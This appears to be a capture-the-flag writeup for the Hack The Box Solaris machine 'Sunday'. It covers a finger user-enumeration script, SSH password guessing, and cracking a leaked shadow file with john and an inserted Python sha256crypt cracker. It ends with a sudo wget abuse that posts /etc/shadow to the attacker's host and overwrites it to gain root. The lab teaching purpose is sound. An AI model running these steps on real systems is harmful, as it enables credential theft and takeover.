Welcome to the Sunday writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Sunday

tags: HTB Easy Solaris OSCP
Platform: Hackthebox
Difficulty: Easy
OS: Solaris

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -p- -T4 10.10.10.76
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-01 18:14 CEST
Warning: 10.10.10.76 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.76
Host is up (0.094s latency).
Not shown: 61791 closed ports, 3739 filtered ports
PORT      STATE SERVICE
79/tcp    open  finger
111/tcp   open  rpcbind
22022/tcp open  unknown
40259/tcp open  unknown
42990/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1823.50 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 79,111,22022,40259,42990 10.10.10.76
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-01 20:34 CEST
Nmap scan report for 10.10.10.76
Host is up (0.095s latency).

PORT      STATE SERVICE VERSION
79/tcp    open  finger  Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp   open  rpcbind 2-4 (RPC #100000)
22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
40259/tcp open  unknown
42990/tcp open  rpcbind
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Sun OpenSolaris 2008.11 (94%), Sun Solaris 10 (94%), Sun Solaris 9 or 10, or OpenSolaris 2009.06 snv_111b (94%), Sun Solaris 9 or 10 (SPARC) (92%), Sun Storage 7210 NAS device (92%), Sun Solaris 9 or 10 (92%), Oracle Solaris 11 (91%), Sun Solaris 8 (90%), Sun Solaris 9 (89%), Sun Solaris 8 (SPARC) (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

TRACEROUTE (using port 111/tcp)
HOP RTT      ADDRESS
1   94.86 ms 10.10.14.1
2   95.01 ms 10.10.10.76

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.53 seconds

Finger

The finger service on port 79 answers a query for a username with that user's details, and Solaris fingerd marks unknown logins with ??? in the Name column, so we can write a small script that feeds it a wordlist and reports which users exist.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# User enumeration for Solaris Finger by X4v1l0k
import sys, socket, time

if len(sys.argv) != 3:
    print('Run me like: python3 userEnum.py ip wordlist')
    exit(0)

ip = sys.argv[1]
# rockyou-style wordlists contain bytes that are not valid UTF-8; skip them
# instead of crashing.
with open(sys.argv[2], 'r', errors='ignore') as f:
    users = f.readlines()

for user in users:
    user = user.strip()
    if not user:
        continue
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(10)
        s.connect((ip, 79))
        # Finger (RFC 1288) takes a single CRLF-terminated query; the server
        # replies and closes the connection, so send once and read until EOF.
        # Python 3 sockets take bytes, hence the encode().
        s.sendall('{}\r\n'.format(user).encode())
        response = b''
        while True:
            chunk = s.recv(1024)
            if not chunk:
                break
            response += chunk
        s.close()
        # Solaris fingerd prints '???' in the Name column for unknown logins.
        if response and b'???' not in response:
            print('{}\tuser exists'.format(user))
    except KeyboardInterrupt:
        s.close()
        exit(0)
    except socket.error:
        # Failed to connect to host: wait 5 seconds before the next user
        time.sleep(5)

Once written, we just have to run it with the IP and a wordlist.

$ python3 userEnum.py 10.10.10.76 /usr/share/wordlists/rockyou_utf8.txt
access  user exists
nobody  user exists
printer user exists
root    user exists
sammy   user exists
sunny   user exists

We now have a few real usernames. A bit of password guessing gets us in: the box name, sunday, is sunny's password, and SSH listens on the non-standard port 22022. SunSSH 1.3 only speaks legacy key exchange, so a modern OpenSSH client has to re-enable diffie-hellman-group1-sha1; with OpenSSH 8.8 or newer you may also need -oHostKeyAlgorithms=+ssh-rsa, because the server can only sign with its SHA-1 RSA or DSA host key.

$ ssh sunny@10.10.10.76 -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1
Password: 
Last login: Fri Apr  2 14:59:16 2021 from 10.10.14.5
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008
sunny@sunday:~$ id
uid=65535(sunny) gid=1(other) groups=1(other)

Post exploitation

Privilege escalation 1

In the root of the filesystem there is a directory called /backup holding two files, agent22.backup and shadow.backup. shadow.backup is world-readable, which a copy of the shadow file should never be.

sunny@sunday:/backup$ ls -la 
total 5
drwxr-xr-x  2 root root   4 2018-04-15 20:44 .
drwxr-xr-x 26 root root  28 2021-04-02 12:46 ..
-r-x--x--x  1 root root  53 2018-04-24 10:35 agent22.backup
-rw-r--r--  1 root root 319 2018-04-15 20:44 shadow.backup

Copy shadow.backup and /etc/passwd to the attacking machine (saved here as shadow and passwd) and combine them with unshadow, which produces the passwd-style lines john expects. sammy's sha256crypt ($5$) hash is the one we still need a password for.

$ unshadow passwd shadow > hash

We can now run john against the hash.

$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude!        (sammy)
1g 0:00:00:23 DONE (2021-04-02 11:36) 0.04253g/s 8711p/s 8711c/s 8711C/s ing456..bluenote
Use the "--show" option to display all of the cracked passwords reliably
Session completed

With sammy's password cooldude! we can SSH in as sammy and read the user flag.

$ ssh sammy@10.10.10.76 -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1
Password: 
Last login: Fri Jul 31 17:59:59 2020
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008
sammy@sunday:~$ id
uid=101(sammy) gid=10(staff) groups=10(staff)
sammy@sunday:~$ cat Desktop/user.txt 
CENSORED_FLAG

Privilege escalation 2

sammy@sunday:~/Desktop$ sudo -l    
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget

sammy can run wget as root without a password, and wget -O writes its output wherever root can, so it can overwrite /etc/shadow. We already have a copy of the shadow file: take shadow.backup, replace root's hash with the hash of an account whose password we know (sammy's cooldude! or sunny's sunday), keep the other lines intact so the existing accounts keep working, and serve the result from our machine with a Python HTTP server. Overwriting /etc/shadow is destructive, so before doing it pull the real file off the box with the same sudo rule, e.g. sudo wget --post-file=/etc/shadow http://10.10.14.5/, which POSTs it as root to a listener on our side (use something like nc -lvnp 80 for that; python's http.server only answers GET). That way the original can be restored afterwards.

$ cat shadow
root:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:18462:0:99999:7:::
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
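Both steps of this section, checking that a candidate password matches a $5$ hash (what john did above) and producing a replacement root line (what the crafted shadow above does by copying sammy's hash), come down to the sha256crypt algorithm that Solaris crypt(3) implements. The following is an added example and not part of the original writeup: a pure-Python sha256crypt that verifies the cracked passwords against the hashes shown above, runs a small wordlist over the file, and rewrites root's field with a freshly salted hash of a password of our choosing instead of reusing sammy's. The embedded shadow text is constructed from the lines above; the function names and the password ch4ng3m3 are assumptions of this example, not anything from the box.

```python
# Pure-Python sha256crypt ($5$): verify the cracked passwords, run a small
# wordlist over the backup, and build a replacement root line for /etc/shadow.
import hashlib
import hmac
import secrets

B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Constructed from the shadow file shown above; only $5$ entries are crackable.
SHADOW_BACKUP = """\
root:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:18462:0:99999:7:::
nobody:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""


def _b64_from_24bit(b2, b1, b0, n):
    """crypt(3)-style base64: emit n chars, low 6 bits first."""
    w = (b2 << 16) | (b1 << 8) | b0
    out = ""
    for _ in range(n):
        out += B64[w & 0x3F]
        w >>= 6
    return out


def sha256crypt(password, salt, rounds=5000):
    """Drepper's SHA-crypt/256 as glibc and Solaris crypt(3) compute it.
    Returns '$5$[rounds=N$]salt$hash'; the salt is truncated to 16 chars."""
    pw, salt = password.encode(), salt.encode()[:16]
    plen = len(pw)
    b = hashlib.sha256(pw + salt + pw).digest()            # digest B
    a_in = pw + salt + b * (plen // 32) + b[:plen % 32]
    n = plen
    while n > 0:                          # one block per bit of len(pw)
        a_in += b if n & 1 else pw
        n >>= 1
    c = hashlib.sha256(a_in).digest()                      # digest A
    dp = hashlib.sha256(pw * plen).digest()
    p = dp * (plen // 32) + dp[:plen % 32]                 # sequence P
    ds = hashlib.sha256(salt * (16 + c[0])).digest()
    s = ds * (len(salt) // 32) + ds[:len(salt) % 32]       # sequence S
    for r in range(rounds):                                # cost loop
        buf = p if r & 1 else c
        if r % 3:
            buf += s
        if r % 7:
            buf += p
        buf += c if r & 1 else p
        c = hashlib.sha256(buf).digest()
    order = [(0, 10, 20), (21, 1, 11), (12, 22, 2), (3, 13, 23), (24, 4, 14),
             (15, 25, 5), (6, 16, 26), (27, 7, 17), (18, 28, 8), (9, 19, 29)]
    enc = "".join(_b64_from_24bit(c[x], c[y], c[z], 4) for x, y, z in order)
    enc += _b64_from_24bit(0, c[31], c[30], 3)
    prefix = "$5$" + (f"rounds={rounds}$" if rounds != 5000 else "")
    return prefix + salt.decode() + "$" + enc


def parse_hash(stored):
    """Split '$5$[rounds=N$]salt$hash' into (rounds, salt, hash)."""
    parts = stored.split("$")
    if len(parts) < 4 or parts[1] != "5":
        raise ValueError("not a sha256crypt hash")
    if parts[2].startswith("rounds="):
        return int(parts[2][len("rounds="):]), parts[3], parts[4]
    return 5000, parts[2], parts[3]


def verify(password, stored):
    """True if password produces the stored hash (constant-time compare)."""
    rounds, salt, digest = parse_hash(stored)
    computed = sha256crypt(password, salt, rounds).rsplit("$", 1)[1]
    return hmac.compare_digest(computed, digest)


def crack_shadow(shadow_text, wordlist):
    """Try each candidate against every $5$ entry; return {user: password}."""
    by_hash = {}                 # accounts sharing a hash cost one computation
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[1].startswith("$5$"):
            by_hash.setdefault(fields[1], []).append(fields[0])
    found = {}
    for stored, users in by_hash.items():
        for cand in wordlist:
            if verify(cand, stored):
                found.update({u: cand for u in users})
                break
    return found


def replace_hash(shadow_text, user, password, salt=None):
    """Return shadow_text with user's hash swapped for a fresh sha256crypt
    of password; this is the file the sudo wget step writes to /etc/shadow."""
    salt = salt or "".join(secrets.choice(B64) for _ in range(16))
    new_hash = sha256crypt(password, salt)
    out = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if fields[0] == user:
            fields[1] = new_hash
        out.append(":".join(fields))
    return "\n".join(out) + "\n"
```

Generating a fresh hash rather than copying sammy's means root's new password does not have to equal a user's password, and the rest of the file (including the locked *LK* and NP entries) stays exactly as Solaris expects it. crack_shadow groups accounts by hash before trying candidates, which is why john above loaded a single hash even though root's and sammy's lines were identical.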

Now download the crafted file on the box with sudo wget, using -O so it is written as root over /etc/shadow, and then su to root with the password that matches the hash we planted.

sammy@sunday:/backup$ sudo wget 10.10.14.5/shadow -O /etc/shadow
--22:14:56--  http://10.10.14.5/shadow
           => `/etc/shadow'
Connecting to 10.10.14.5:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 399 [application/octet-stream]

100%[==========================================================================>] 399           --.--K/s             

22:14:56 (62.78 MB/s) - `/etc/shadow' saved [399/399]

sammy@sunday:/backup$ su root
Password: 
root@sunday:/backup# id
uid=0(root) gid=0(root)
root@sunday:/backup# cat /root/root.txt
CENSORED_FLAG